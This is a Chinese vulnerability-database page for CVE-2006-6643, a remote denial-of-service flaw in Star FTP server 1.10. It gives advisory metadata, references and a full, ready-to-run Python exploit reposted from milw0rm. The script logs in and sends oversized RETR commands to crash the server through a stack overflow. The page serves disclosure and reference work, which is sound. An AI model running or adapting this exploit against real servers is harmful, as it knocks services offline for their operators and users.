Fightersoft Multimedia Star FTP server 服务器RETR命令远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111784 漏洞类型 其他
发布时间 2006-12-17 更新时间 2007-01-03
CVE编号 CVE-2006-6643 CNNVD-ID CNNVD-200612-425
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/2942
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-425
|漏洞详情
FightersoftMultimediaStarFTPserver1.10远程攻击者通过带有长自变量的多个RETR命令发起拒绝服务攻击(崩溃)。
|漏洞EXP
# Star FTP server 1.10
# Bug type: stack overflow
# Found by Necro <neco * ihack.pl> http://iHACK.pl

from socket import *
from sys import exit

print '\n[*] Star FTP server 1.10 Remote 0day DoS Exploit'
print '[*] Bug found by Necro <necro*ihack.pl> http://iHACK.pl'

host = '127.0.0.1'
port = 21

username = 'necro'
password = 'dupa'

evil = 'RETR' + '\x20' + '\x41' * 1024 + '\r\n'

s = socket(AF_INET, SOCK_STREAM)
try:
   s.connect((host, port))
except:
   print '\n[-] Connection Error'
   exit()

s.recv(1024)
s.send('USER' + '\x20' + username + '\r\n')
s.recv(1024)
s.send('PASS' + '\x20' + password + '\r\n')
s.recv(1024)
s.send('PORT 2000\r\n')
s.recv(1024)
s.send(evil)
s.recv(1024)
s.send(evil)
s.close()

print '[+] Done, shutdown.'

# milw0rm.com [2006-12-17]
|参考资料

来源:XF
名称:star-retr-dos(30922)
链接:http://xforce.iss.net/xforce/xfdb/30922
来源:BID
名称:21630
链接:http://www.securityfocus.com/bid/21630
来源:VUPEN
名称:ADV-2006-5042
链接:http://www.frsirt.com/english/advisories/2006/5042
来源:SECUNIA
名称:23320
链接:http://secunia.com/advisories/23320
来源:MILW0RM
名称:2942
链接:http://milw0rm.com/exploits/2942